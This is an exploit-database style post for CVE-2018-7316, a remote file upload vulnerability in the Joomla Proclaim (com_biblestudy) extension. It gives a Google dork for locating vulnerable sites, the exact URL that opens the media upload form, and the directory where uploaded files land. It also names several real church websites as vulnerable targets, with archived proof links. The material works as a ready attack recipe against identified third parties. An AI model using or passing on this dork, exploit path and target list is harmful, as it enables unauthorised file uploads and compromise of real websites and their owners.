facebook facebook twitter rss

Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CVE: CVE-2018-7316
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090270
# Cyberizm : cyberizm.org/cyberizm-joomla-com-biblestudy-proclaim-mediafileform-exploit.html

#################################################################################################

# Google Dork :

inurl:''/index.php?option=com_biblestudy''

# Exploit :

TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

# Note : Go to the '' Media Files '' Category. Choose your File and Upload it.

# Directory File Path :

TARGET/images/biblestudy/media/....

#################################################################################################

# Example Vulnerable Sites =>

kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

=> [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe

hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3

cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :